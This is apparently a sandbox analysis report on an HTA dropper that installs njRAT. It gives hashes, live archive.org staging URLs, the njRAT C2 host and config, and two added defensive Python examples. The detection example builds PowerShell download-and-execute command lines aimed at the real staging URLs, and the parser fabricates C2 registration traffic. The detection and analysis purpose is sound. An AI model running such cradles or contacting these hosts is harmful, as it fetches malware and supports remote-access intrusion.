General

  • Target

    ac374efc62c6d14364c314e119e576ba

  • Size

    1KB

  • Sample

    240228-swgwcseg85

  • MD5

    ac374efc62c6d14364c314e119e576ba

  • SHA1

    578d0cfc3271dc0831a03a98776c5eb62c4dcb84

  • SHA256

    2ebc6f6879d6b4b2bdacdc34d4472b5f5c2a46c0b4d4907bab6b56af56ea0cb3

  • SHA512

    95e4af6eb641be115df0bf5c6f333d6039956f0f1407b05408e5877d5a5e342a5440429d17e808048c3c1b27c382a942d8de8d0c5a2230bb1abf769ca57a497a

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://ia601406.us.archive.org/21/items/invoice-011/Invoice%23011.txt

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://ia601509.us.archive.org/18/items/bypass_20210729_1426/bypass.txt
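The two staging URLs above describe the delivery chain the report extracted: an HTA pulls a text file from archive.org, the PowerShell inside it pulls a second text file, and that stage drops the executable. The detection below is an added example written for this page, not code from the sandbox or the report. It runs a rule set over constructed process-creation records shaped like Sysmon Event ID 1 (the command lines are illustrative, not the sample's real ones), decodes a -EncodedCommand argument before inspecting it, and flags PowerShell that was spawned by mshta.exe, PowerShell that references one of the report's staging hosts, and generic download-cradle keywords. The staging host list is taken verbatim from the report; everything else (record fields, rule names, marker strings) is this example's own choice.

```python
"""Detection logic for the mshta -> PowerShell -> remote-text staging chain.

Added example, not part of the sandbox report. The process records are
constructed to resemble Sysmon Event ID 1 (process creation) fields; the
command lines are illustrative and not the sample's real ones.
"""
import base64
import re
from urllib.parse import urlparse

# Staging URLs taken from the report's extracted config.
STAGING_URLS = (
    "https://ia601406.us.archive.org/21/items/invoice-011/Invoice%23011.txt",
    "https://ia601509.us.archive.org/18/items/bypass_20210729_1426/bypass.txt",
)
STAGING_HOSTS = {urlparse(u).hostname.lower() for u in STAGING_URLS}

# Strings that commonly appear in PowerShell download cradles (example list).
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                    "iwr ", "net.webclient", "invoke-expression", "iex")

# -EncodedCommand and its short forms, followed by the base64 argument.
ENCODED_ARG = re.compile(r"(?i)[-/](?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)")
URL_HOST = re.compile(r"(?i)https?://([^/\s'\"]+)")


def image_is(path, name):
    """Compare the file name of an image path, ignoring directory and case."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower() == name


def expand_encoded_command(cmdline):
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE) to the line."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # not valid base64/UTF-16: inspect the raw line only
    return cmdline + " " + decoded


def staging_hosts_in(text):
    """Hosts from the report's staging URLs that appear in the text."""
    return {h.lower() for h in URL_HOST.findall(text)} & STAGING_HOSTS


def detect_staging_chain(records):
    """Return one finding per PowerShell process that matches at least one rule."""
    by_pid = {r["ProcessId"]: r for r in records}
    findings = []
    for r in records:
        if not (image_is(r["Image"], "powershell.exe") or image_is(r["Image"], "pwsh.exe")):
            continue
        cmd = expand_encoded_command(r["CommandLine"])
        parent = by_pid.get(r["ParentProcessId"])
        rules = []
        if parent is not None and image_is(parent["Image"], "mshta.exe"):
            rules.append("mshta_spawns_powershell")
        hosts = staging_hosts_in(cmd)
        if hosts:
            rules.append("powershell_contacts_staging_host")
        if any(m in cmd.lower() for m in DOWNLOAD_MARKERS):
            rules.append("powershell_download_cradle")
        if rules:
            findings.append({"pid": r["ProcessId"], "rules": rules, "hosts": sorted(hosts)})
    return findings


def _encode_ps(script):
    """Build the -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed records: explorer -> mshta -> powershell (stage 1) -> powershell (stage 2),
# plus one benign PowerShell process that must not be flagged.
STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('" + STAGING_URLS[0] + "')"
STAGE2 = ("$u='" + STAGING_URLS[1] + "'; "
          "IEX ((New-Object Net.WebClient).DownloadString($u))")
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_RECORDS = [
    {"ProcessId": 100, "ParentProcessId": 1, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": "explorer.exe"},
    {"ProcessId": 200, "ParentProcessId": 100, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Users\victim\Downloads\Invoice#011.hta"'},
    {"ProcessId": 300, "ParentProcessId": 200, "Image": PS_IMAGE,
     "CommandLine": "powershell.exe -NoP -W Hidden -EncodedCommand " + _encode_ps(STAGE1)},
    {"ProcessId": 400, "ParentProcessId": 300, "Image": PS_IMAGE,
     "CommandLine": 'powershell.exe -w hidden -c "' + STAGE2 + '"'},
    {"ProcessId": 500, "ParentProcessId": 100, "Image": PS_IMAGE,
     "CommandLine": "powershell.exe -c Get-Date"},
]

if __name__ == "__main__":
    for finding in detect_staging_chain(SAMPLE_RECORDS):
        print(finding)
```

Decoding the encoded command before matching matters here: the first PowerShell stage carries its URL only inside the base64 argument, so a rule that looks at the raw command line would see the mshta parent but never the staging host.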

Extracted

  • Family

    njrat

  • Version

    v4.0

  • Botnet

    HacKed

  • C2

    gerousd8.duckdns.org:7827

  • Mutex

    Windows

Attributes
  • reg_key

    Windows

  • splitter

    |-F-|
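The njRAT configuration above gives a network defender three things to key on: the C2 host and port, the botnet name that prefixes each victim id, and the splitter string that separates fields inside every C2 message. The following parser is an added example written for this page, not code from the report or from the malware. It assumes the commonly documented njRAT wire format (an ASCII decimal byte count, a NUL byte, then the payload; payload fields joined by the configured splitter, the first field being the command verb; a registration message starting with "ll" whose first field is "<botnet>_<hwid>"), reassembles frames from a byte stream including a trailing partial frame, and picks out registrations that belong to the "HacKed" botnet. The stream it parses is constructed, and the field order inside the registration is illustrative rather than taken from the sample.

```python
"""Parse njRAT C2 traffic using the splitter and botnet id from this report.

Added example, not part of the sandbox report. Assumed wire format (not
verified against this sample): '<decimal length>\\x00<payload>', payload
fields joined by the configured splitter, first field = command verb, and
registration ("ll") messages carrying the victim id as '<botnet>_<hwid>'.
The captured stream below is constructed.
"""

# Values from the report's extracted config.
NJRAT_CONFIG = {
    "botnet": "HacKed",
    "c2": ("gerousd8.duckdns.org", 7827),
    "splitter": "|-F-|",
    "mutex": "Windows",
    "reg_key": "Windows",
}


def frame(payload):
    """Build one wire frame; the length counts payload bytes, not characters."""
    data = payload.encode("utf-8")
    return str(len(data)).encode("ascii") + b"\x00" + data


def split_frames(buf):
    """Return (complete payloads, leftover bytes). Leftover is an unfinished frame."""
    payloads = []
    while True:
        nul = buf.find(b"\x00")
        if nul == -1:
            break  # length prefix not complete yet
        prefix = buf[:nul]
        if not prefix.isdigit() or len(prefix) > 10:
            raise ValueError("not an njRAT frame: bad length prefix %r" % prefix)
        length = int(prefix)
        start = nul + 1
        if len(buf) < start + length:
            break  # payload not fully received yet
        payloads.append(buf[start:start + length])
        buf = buf[start + length:]
    return payloads, buf


def parse_message(payload, splitter):
    """Split one payload into its command verb and the remaining fields."""
    fields = payload.decode("utf-8", errors="replace").split(splitter)
    return {"cmd": fields[0], "fields": fields[1:]}


def find_beacons(buf, cfg=NJRAT_CONFIG):
    """Return registration messages whose victim id belongs to cfg['botnet']."""
    payloads, _ = split_frames(buf)
    beacons = []
    for p in payloads:
        msg = parse_message(p, cfg["splitter"])
        if msg["cmd"] != "ll" or not msg["fields"]:
            continue
        victim = msg["fields"][0]
        botnet, sep, hwid = victim.partition("_")
        if sep and botnet == cfg["botnet"]:
            beacons.append({"victim": victim, "hwid": hwid, "fields": msg["fields"]})
    return beacons


def looks_like_njrat(buf, cfg=NJRAT_CONFIG):
    """Cheap triage check: valid framing and at least one payload using the splitter."""
    try:
        payloads, _ = split_frames(buf)
    except ValueError:
        return False
    return any(cfg["splitter"].encode("utf-8") in p for p in payloads)


# Constructed stream: a registration for this botnet, a keepalive, a registration
# from an unrelated botnet, and the first bytes of a frame still in flight.
SPL = NJRAT_CONFIG["splitter"]
REGISTRATION = SPL.join(["ll", "HacKed_5A1B2C3D", "DESKTOP-4Q7Z", "victim",
                         "24-02-28", "", "Win 10 Pro x64", "No", "v4.0", "..",
                         "Invoice#011.txt - Notepad"])
KEEPALIVE = "P"
OTHER_BOTNET = SPL.join(["ll", "OtherBot_DEADBEEF", "PC-2", "user"])
SAMPLE_STREAM = (frame(REGISTRATION) + frame(KEEPALIVE) + frame(OTHER_BOTNET)
                 + b"12\x00part")

if __name__ == "__main__":
    print(looks_like_njrat(SAMPLE_STREAM))
    for beacon in find_beacons(SAMPLE_STREAM):
        print(beacon["victim"], beacon["fields"][1:3])
```

Because the splitter is part of the build-time config, matching on it is specific to this sample family and build; a different njRAT build with another splitter would still pass the framing check in looks_like_njrat but fail the splitter test, which is why the function requires both.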

Targets

    • Target

      ac374efc62c6d14364c314e119e576ba

    • Size

      1KB

    • MD5

      ac374efc62c6d14364c314e119e576ba

    • SHA1

      578d0cfc3271dc0831a03a98776c5eb62c4dcb84

    • SHA256

      2ebc6f6879d6b4b2bdacdc34d4472b5f5c2a46c0b4d4907bab6b56af56ea0cb3

    • SHA512

      95e4af6eb641be115df0bf5c6f333d6039956f0f1407b05408e5877d5a5e342a5440429d17e808048c3c1b27c382a942d8de8d0c5a2230bb1abf769ca57a497a

    Score
    10/10
    • njRAT/Bladabindi

      Widely used RAT written in .NET.

    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Drops file in System32 directory

    • Suspicious use of SetThreadContext

MITRE ATT&CK Enterprise v15
